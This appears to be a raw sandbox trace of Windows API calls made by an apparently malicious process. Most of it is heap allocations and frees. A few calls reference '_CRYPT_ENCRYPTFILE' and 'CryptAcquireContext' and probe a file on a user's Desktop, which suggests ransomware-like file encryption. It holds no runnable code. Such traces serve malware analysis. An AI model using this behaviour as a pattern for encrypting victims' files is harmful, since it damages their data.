[0125.252] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0125.253] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.253] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0125.253] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0125.253] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.254] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0125.255] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0125.255] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d58, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0125.255] CloseHandle (hObject=0x2a0) returned 1 [0125.256] FreeLibrary (hLibModule=0x772d0000) returned 1 [0125.256] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0125.256] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14423090, ftCreationTime.dwHighDateTime=0x1d5e5ae, ftLastAccessTime.dwLowDateTime=0xf27c3430, ftLastAccessTime.dwHighDateTime=0x1d5e3cb, ftLastWriteTime.dwLowDateTime=0xf27c3430, ftLastWriteTime.dwHighDateTime=0x1d5e3cb, nFileSizeHigh=0x0, nFileSizeLow=0x86e3, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="OD9hoNYV uW0IIj2du.bmp", cAlternateFileName="OD9HON~1.BMP")) returned 0x41ac500 [0125.256] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0125.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0125.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0125.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.257] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0125.257] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0125.257] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0125.257] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0125.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0125.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0125.258] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0125.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0125.263] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0125.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0125.264] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0125.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0125.266] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0125.266] PeekMessageW (in: lpMsg=0x144ea34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea34) returned 0 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.266] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0125.267] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0125.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0125.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0125.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0125.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0125.269] 